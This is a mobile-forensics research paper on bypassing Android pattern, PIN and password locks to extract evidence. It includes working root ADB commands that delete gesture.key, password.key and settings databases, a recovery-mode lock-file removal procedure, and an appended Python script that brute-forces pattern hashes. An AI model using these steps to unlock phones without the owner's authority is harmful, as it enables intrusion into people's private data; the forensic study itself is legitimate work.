At the end of 2015, there were 4.7 billion noteworthy mobile subscribers globally, equivalent to 63% of
the world’s population. Mobile phones have all the essential components neatly fitted into a small space
and are designed to achieve high speeds, massive storage, and increased functionality. Smart phones are
used for exchanging information through calling, texting, Internet browsing, e-mail, photos, videos, etc.
Criminals can use smart phones for a number of activities, namely committing fraud over e-mail,
harassment via text messages, drug trafficking, child pornography, etc. In this research paper, we
demonstrate how, if a mobile phone is identified in a criminal activity and is locked by any one of the
locking mechanisms such as pattern lock, PIN lock or password lock, the mobile device can be unlocked
without data loss for forensic examination. It is a great challenge for forensic experts to extract data
from a mobile phone for forensic purposes that can be used as evidence in a court of law. The
experimental results show that our approach can break all kinds of pattern locks.

Keywords: Analysis tools, Mobile device analysis, Mobile forensics, Mobile phones, Smart phone


Copyright © 2018 Institute of Advanced Engineering and Science. 
All rights reserved. 


Corresponding Author: 


G. Srinivas, 

Department of Information Technology, 

Anil Neerukonda Institute of Technology and Sciences, 
Visakhapatnam 530045, Andhra Pradesh, India. 

Email: gsrinivas.it@anits.edu.in 


1. INTRODUCTION 

Mobile phone forensics is a branch of digital forensics: the application of technological methods to
discover and examine the facts held in mobile phone data. The Android operating system is currently the
most widely used smart phone OS, with a market share of 85% as of the first quarter of 2017 [1]. As the
number of Android users increases, the potential for evidence of crimes to be stored on Android devices
also increases [2]. This gives a clear indication that mobile phone forensics is used for extracting and
analyzing evidential data from Android mobile devices. If a mobile device is identified in a criminal
activity and it is locked, it is difficult for the mobile phone forensic investigator to unlock the device
and extract the data from it, because nowadays mobile phones have different types of screen lock
mechanisms, such as swipe lock, PIN lock, pattern lock, fingerprint lock, etc. Pattern lock is widely used
on Android devices to protect sensitive information. It is preferred by some users over PIN or text-based
passwords, as psychology studies show that the human brain remembers and recalls visual information
better than numbers and letters [3]. According to a recent study, 40% of Android users use patterns to
protect their devices instead of a PIN [4]. In this paper, we demonstrate how to unlock the mobile device
without data loss for forensic examination by using various methodologies. The first step in the forensic
exploration is to get into the mobile phone by bypassing the locked screen: removal of the PIN lock is
shown in Figure 3, removal of the password lock is shown in Figure 4, and how to unlock the mobile device
without removing the pattern lock is shown in Figure 6, Figure 7 and Figure 8. The experimental results in
Table 1 show the equivalent hash key value and gesture key value obtained for different pattern locks by
the improvised methodologies described in this research paper.


2. RESEARCH METHOD 

It is important to have an established forensic environment before beginning the examination, as it
ensures that the data is protected. This paper covers the requirements that should be in place to start a
forensic investigation of an Android mobile device. The Android SDK furnishes tools that can be of great
help during analysis and examination of the mobile phone. During a forensic investigation, the SDK helps
to connect to and access the data on the Android device. Nowadays, users can easily lock an Android
mobile phone with the screen lock options, so bypassing the mobile phone screen lock during an
investigation is crucial. Android mobile devices offer different types of screen lock mechanisms:
1. Pattern, 2. PIN, 3. Password, 4. Fingerprint, etc. There are several techniques to unlock an Android
mobile phone: 1. Recovery Login, 2. Aroma File Manager, 3. Rooting and ADB, 4. Unlock the pattern lock
without removing the pattern.


2.1. Recovery login 

a. Enter a wrong lock screen code five times; a pop-up window will then appear. Wait for the time
displayed on the screen and then make another attempt.

b. If you have the backup PIN, press the backup PIN option and enter the four-digit PIN. The phone will
then be unlocked.

c. If you do not have the backup PIN, select the forgot password option. Make sure mobile data is
enabled, then enter the Google mail ID and password registered to that phone, and the phone will be
unlocked.

Drawback: If mobile data or Wi-Fi is not enabled, this technique may not work.


2.2. Aroma file manager 

a. “Copy the Aroma File manager ZIP file from the internet” [5]. 

b. After downloading, copy it onto the mobile phone’s secure digital card, and insert the secure digital
card into the mobile phone and lock it.

c. Make sure the mobile phone is completely shut down, then hold the correct keys to boot the device into
recovery mode. For the Samsung Galaxy Duos 2 GT-S7582 device, hold down the Volume Up, Home and
Power buttons.

d. Release the buttons when the device is powered on. Hold the buttons for a few seconds. The device is
now in recovery mode.

e. Use the volume up and down keys to move through the menu choices and select install ZIP from secure
digital card. Press the power button to confirm your selection. Now specify the location from which to
install ‘aroma file manager’ on the secure digital card. Subsequently open ‘aroma file manager’ again.

f. Open the data folder and then the system folder and look for the gesture or password file for the
pattern or password lock. Then remove whichever file is present and restart the mobile device.

g. After the Android operating system has reloaded, if the password or pattern lock is still present,
don’t panic: just draw any pattern and the mobile phone will open.


2.3. Rooting and ADB 

Rooting means modifying a mobile phone to remove restrictions imposed by the manufacturer or operator
and to allow installation of unauthorized software, removal of unwanted bloatware, enhancement of the
operating system, replacement of the firmware, running the processor of the device at a speed higher than
intended (overclocking) or at a lower clock rate than specified (underclocking), customizing anything,
and so on. Rooting around in a mobile phone’s core software might look like a set of instructions for
preparing a particular dish. If any interruption happens during rooting, the mobile phone can become
completely unable to function. It can also void the warranty. Rooting introduces an unspecified amount of
security risk. It could create a security vulnerability, and malware could gain access to rooted status
to steal data.

2.3.1. Construct a root

First, back up everything and make sure the device is fully charged before starting. Turn on USB
Debugging. To do that, open Settings on the device. If Developer Options is not visible, go to the last
portion of Settings and proceed with the following steps.

a. Press About Phone and find the Build Number.
b. Press the build number seven times; the developer options will then appear on the screen.
c. Press the back key to see the developer options.
d. Press Developer Options.
e. Check the box to grant USB debugging.


2.3.2. How to root Samsung Galaxy S Duos 2 GT-S7582 with iRoot. 

Step 1: Install Samsung USB Driver [6]. 

Step 2: Allow USB Debugging on the mobile phone. To allow USB debugging, open Settings, then Developer
Options, then USB Debugging, and check the box to enable it.

Step 3: Download and install the iRoot application [7].

Step 4: Once the iRoot application is installed, open it.

Step 5: Once the iRoot application has started, connect the mobile phone to the computer.

Step 6: Press the root button to start the rooting procedure.

Step 7: The application automatically reboots the mobile phone.

Step 8: It is rooted.

2.3.3. Android debugging bridge (ADB)

ADB is used to build a bridge between the computer and the mobile phone. It can be used to unlock the
device and to retrieve the data. This process will only work if you have authorized USB debugging on the
Android mobile phone.

a. Download the Android SDK package [8] to your computer from the internet. Once downloaded, extract the
zip file on the computer.

b. Download the pertinent USB drivers for the mobile phone [5]. Obtain the USB drivers for the mobile
device from the manufacturer’s website.

c. Open the command prompt on the computer and change the directory to where the ADB file is located by
typing the following command in the command prompt.
cd C:\android-sdk-windows\platform-tools

d. Attach the mobile phone to the computer using a USB cable and type the following command.
C:\android-sdk-windows\platform-tools> adb devices -l

If the mobile phone is identified, the command prompt message shows the serial code (42038e42ca933100),
phone model (GT-S7582) and device product (Kernel: kyleprodsxx). The list of devices attached to the
computer is shown in Figure 1.


C:\android-sdk-windows\platform-tools>adb devices -l
List of devices attached
42038e42ca933100 device product:kyleprodsxx model:GT_S7582 device:kyleprods

C:\android-sdk-windows\platform-tools>


Figure 1. Displays the list of attached devices 


Now enter the following commands to remove the pattern lock.
C:\android-sdk-windows\platform-tools> adb shell
shell@android:/ $ su
su (short for substitute user, super user, or switch user) is usually the simplest and most appropriate
way to change the ownership of a login session to root.


Figure 2 shows the login session as root.

C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ #


Figure 2. Login Session as a root 


The pattern lock is a medium security mechanism. The drawn pattern is stored in the gesture.key file,
which is located in the /data/system directory. To remove it, type the following command.
root@android:/ # rm /data/system/gesture.key

C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ # rm /data/system/gesture.key
rm /data/system/gesture.key
root@android:/ # reboot
reboot

C:\android-sdk-windows\platform-tools>


Figure 3. Removing the gesture.key 


After removing gesture.key, restart the mobile device using the reboot command. If, after the restart, the
device still shows the draw pattern lock, don’t panic: just draw any random pattern to unlock the device.
If the device is password protected, use the following command to remove the password:
root@android:/ # rm /data/system/password.key

C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ # rm /data/system/password.key
rm /data/system/password.key
root@android:/ # reboot
reboot

C:\android-sdk-windows\platform-tools>


Figure 4. Removing the password.key 


After removing password.key, restart the mobile device using the reboot command. This time the mobile
will start directly without prompting any popup screen on the device. This method works when the device
is rooted. If the above procedure does not work properly, follow these instructions to remove the lock.

1. Connect the mobile phone to the computer using the USB cable.

2. Open the command prompt as described earlier and type the following commands.
C:\android-sdk-windows\platform-tools>adb.exe shell
shell@android:/ $ su
root@android:/ # cd /data/data/com.android.providers.settings/databases
root@android:/data/data/com.android.providers.settings/databases # rm settings.db
root@android:/data/data/com.android.providers.settings/databases # rm settings.db-shm
root@android:/data/data/com.android.providers.settings/databases # rm settings.db-wal
root@android:/data/data/com.android.providers.settings/databases # reboot


Figure 5 shows the removal of the settings to unlock the device.

C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ # cd /data/data/com.android.providers.settings/databases
cd /data/data/com.android.providers.settings/databases
root@android:/data/data/com.android.providers.settings/databases # ls
root@android:/data/data/com.android.providers.settings/databases # rm settings.db
root@android:/data/data/com.android.providers.settings/databases # rm settings.db-shm
root@android:/data/data/com.android.providers.settings/databases # rm settings.db-wal
root@android:/data/data/com.android.providers.settings/databases # reboot

C:\android-sdk-windows\platform-tools>


Figure 5. Removing the settings to unlock the device 


3. Now the Android mobile phone would be unlocked. 


2.4. Unlock the pattern lock without removing the pattern

This method works on a rooted mobile phone. First, locate the gesture.key file, which is in the
/data/system directory. To see the file, type the following commands.
C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ # cd /data/system
cd /data/system
root@android:/data/system # ls

Afterwards, create a folder in the phone memory; all the files in phone memory are available at
/storage/emulated/0. I have created a folder called check in phone memory. Now copy gesture.key into the
check folder as shown below.
root@android:/data/system # cp /data/system/gesture.key /storage/emulated/legacy/check/
root@android:/data/system #


C:\android-sdk-windows\platform-tools>adb shell
shell@android:/ $ su
su
root@android:/ # cd /data/system
cd /data/system
root@android:/data/system # cp /data/system/gesture.key /storage/emulated/legacy/check/
root@android:/data/system #


Figure 6. Copy the gesture.key into phone memory 


When copying gesture.key into the check folder, note the path: even though the check folder is located at
/storage/emulated/0 in the phone memory, you should use legacy instead of 0 in the path. Now, copy
gesture.key from the phone memory to the computer. Download a hexadecimal editor [9] from the internet.
Open the gesture.key file in the hexadecimal editor.

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  C8 C0 B2 4A 15 DC 8B BF D4 11 42 79 73 57 46 95
00000010  23 04 58 F0


Figure 7. Hexadecimal values of gesture.key 


Now copy only the hexadecimal values into Notepad and remove the whitespace between the hexadecimal
numbers. It now looks like this: C8C0B24A15DC8BBFD411427973574695230458F0. Afterwards, open the URL
https://barney.0x539.se/android/, copy the hexadecimal values into the text box and press the Get gesture
button. The entered hash value and the gesture key will then appear. If you want to see a graphical image
of the pattern, press the Show pattern button. Now use this gesture key to remove the lock of the mobile
device.


Android hash to gesture
Enter hash reported by the program
C8C0B24A15DC8BBFD411427973574695230458F0
Get gesture
Hash
C8C0B24A15DC8BBFD411427973574695230458F0
Gesture
0 => 3 => 6 => 7 => 8
Show pattern


Figure 8. Gesture value and Gesture pattern of Hash Value 
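
Why a lookup like the one at the URL above can resolve any pattern hash, as an added example that is not part of the original paper: it assumes the legacy Android gesture.key format (a 20-byte unsalted SHA-1 over one byte per touched cell, cells numbered 0 to 8), which the paper does not state, and enumerates every pattern the lock screen accepts. The function names are illustrative; the sample bytes are the ones shown in Figure 7.

```python
import hashlib

def _middle(a, b):
    """Cell lying exactly between cells a and b on the 3x3 grid, else None."""
    (ra, ca), (rb, cb) = divmod(a, 3), divmod(b, 3)
    if (ra + rb) % 2 == 0 and (ca + cb) % 2 == 0:
        return ((ra + rb) // 2) * 3 + (ca + cb) // 2
    return None

def valid_patterns(min_len=4, max_len=9):
    """Yield every pattern the lock screen accepts, as a tuple of cells 0..8."""
    def extend(path, used):
        if len(path) >= min_len:
            yield tuple(path)
        if len(path) == max_len:
            return
        for nxt in range(9):
            if nxt in used:
                continue
            mid = _middle(path[-1], nxt)
            if mid is not None and mid not in used:
                continue  # a stroke may not jump over a cell that is still unused
            path.append(nxt)
            used.add(nxt)
            yield from extend(path, used)
            path.pop()
            used.discard(nxt)
    for start in range(9):
        yield from extend([start], {start})

def pattern_hash(cells):
    """Assumed legacy format: unsalted SHA-1 over one byte per cell index."""
    return hashlib.sha1(bytes(cells)).digest()

def recover_pattern(gesture_key):
    """Return the cell sequence whose hash equals gesture_key, or None."""
    if len(gesture_key) != 20:
        raise ValueError("gesture.key should hold a 20-byte SHA-1 digest")
    for cells in valid_patterns():
        if pattern_hash(cells) == gesture_key:
            return list(cells)
    return None

if __name__ == "__main__":
    # Bytes as displayed in Figure 7 of the paper.
    sample = bytes.fromhex("C8C0B24A15DC8BBFD411427973574695230458F0")
    total = sum(1 for _ in valid_patterns())
    print("patterns to try:", total)
    print("recovered:", recover_pattern(sample))
```

The whole search space is 389,112 patterns, so an unsalted hash of the pattern offers no protection once the file itself can be read.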


3. EXPERIMENTAL RESULTS 

In this section we present the results obtained from the experiments; the following table summarizes the
test results for each test scenario conducted. The test results show the hash key value and gesture key
value of every pattern lock, obtained by using the improvised methodologies described in this paper. The
hash key value can be retrieved from the gesture.key file, which is located in the /data/system directory
of the mobile device. The hash value of every pattern was tested at the URL
https://barney.0x539.se/android/ to obtain the original pattern image. The experimental results are shown
in Table 1.
Table 1. The Experimental Results of the Pattern, its Hash Value and its Gesture Value

[Table 1 columns: S.No; Pattern lock of a Mobile Phone; Hash key value of pattern lock; Gesture key value of lock]

4. CONCLUSION

An appropriate setup is essential before conducting investigations on an Android mobile phone. If
forensic acquisition needs the Android device to be unlocked, find the best method to obtain access to the
mobile phone. The diverse screen lock bypassing techniques discussed in this paper help the examiner to
bypass the passcode under different circumstances. Depending on the forensic acquisition method and the
scope of the investigation, rooting the device should provide complete access to the files present on the
mobile phone.